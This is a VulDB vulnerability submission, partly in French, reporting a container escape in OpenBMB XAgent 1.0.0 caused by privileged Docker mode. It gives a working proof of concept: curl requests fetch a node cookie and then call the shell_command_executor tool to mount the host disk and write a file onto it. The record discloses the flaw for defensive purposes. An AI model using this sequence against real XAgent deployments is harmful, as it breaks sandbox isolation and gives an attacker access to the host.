| Titre | OpenBMB XAgent v1.0.0 Container Escapes |
|---|
| Description | Docker Enabling Privileged Mode Causes Container Escapes.
1. Installation and startup XAgent (https://github.com/OpenBMB/XAgent)
```bash
git clone https://github.com/OpenBMB/XAgent.git
docker-compose up -d
```
2. Creating Tool Container
```bash
curl -v --request POST 'http://localhost:8080/get_cookie'
...
< HTTP/1.1 200 OK
...
< set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx; Path=/; SameSite=lax
...
```
Extract container ID: set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx;
3. Execute malicious command escape container
```
curl --request POST 'http://localhost:8080/execute_tool' --header 'Cookie: node_id={{Container ID}}' --header 'Content-Type: application/json' --data \
'{
"tool_name":"shell_command_executor",
"arguments":{"command":"mkdir test; mount /dev/sda1 test; echo hello > test/hello.txt"}
}'
```
The file created in containers on the host: `cat /boot/hello.txt`. |
|---|
| La source | ⚠️ https://github.com/OpenBMB/XAgent/issues/386 |
|---|
| Utilisateur | zznQ (UID 64000) |
|---|
| Soumission | 19/02/2024 10:35 (il y a 2 ans) |
|---|
| Modérer | 29/02/2024 14:24 (10 days later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 255265 [OpenBMB XAgent 1.0.0 Privileged Mode élévation de privilèges] |
|---|
| Points | 20 |
|---|